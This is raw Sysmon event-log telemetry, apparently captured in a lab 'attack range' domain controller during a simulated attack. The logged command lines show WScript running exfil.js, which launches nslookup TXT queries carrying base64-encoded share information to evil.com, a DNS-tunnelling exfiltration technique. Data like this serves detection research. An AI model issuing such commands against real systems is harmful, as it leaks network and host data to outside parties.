14:21:54.208{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.209{2E1864BB-1902-629A-B146-000000005F02}3616C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzjfu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.204{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkrt.tmpMD5=72212EBDCB2E8E793A1B2134D4FA7DE3,SHA256=B332410D88A2D1B397F1BE63E741050D785B52E6644B4C66DB2FEDBE9A959973,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.155{2E1864BB-1902-629A-AF46-000000005F02}79407432C:\Windows\system32\conhost.exe{2E1864BB-1902-629A-B046-000000005F02}7196C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.155{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.155{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.155{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.155{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.155{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-B046-000000005F02}7196C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.155{2E1864BB-1902-629A-AE46-000000005F02}53926124C:\Windows\system32\cmd.exe{2E1864BB-1902-629A-B046-000000005F02}7196C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.159{2E1864BB-1902-629A-B046-000000005F02}7196C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1902-629A-AE46-000000005F02}5392C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkrt.tmp 2>&1 10341000x8000000000000000216477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.123{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-1902-629A-AF46-000000005F02}7940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.108{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-1902-629A-AF46-000000005F02}7940C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.108{2E1864BB-1902-629A-AF46-000000005F02}79407432C:\Windows\system32\conhost.exe{2E1864BB-1902-629A-AE46-000000005F02}5392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.085{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-AF46-000000005F02}7940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.085{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.085{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.085{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.085{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.085{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-AE46-000000005F02}5392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.085{2E1864BB-18E0-629A-6742-000000005F02}39767568C:\Windows\System32\WScript.exe{2E1864BB-1902-629A-AE46-000000005F02}5392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.090{2E1864BB-1902-629A-AE46-000000005F02}5392C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkrt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000216466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.085{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldmqhxhe.tmpMD5=8243B24CCFEB9BB233B3379BEC4F1A23,SHA256=640266002D96A03904AAA3A39C38EBB9E7EB5FB5F8774575491C759B17BE418A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.054{2E1864BB-1902-629A-AC46-000000005F02}29282900C:\Windows\system32\conhost.exe{2E1864BB-1902-629A-AD46-000000005F02}5860C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.054{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.054{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.054{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.054{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.054{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-1902-629A-AD46-000000005F02}5860C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.054{2E1864BB-1902-629A-AB46-000000005F02}14007464C:\Windows\system32\cmd.exe{2E1864BB-1902-629A-AD46-000000005F02}5860C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:54.055{2E1864BB-1902-629A-AD46-000000005F02}5860C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-1902-629A-AB46-000000005F02}1400C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldmqhxhe.tmp 2>&1 10341000x8000000000000000216457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 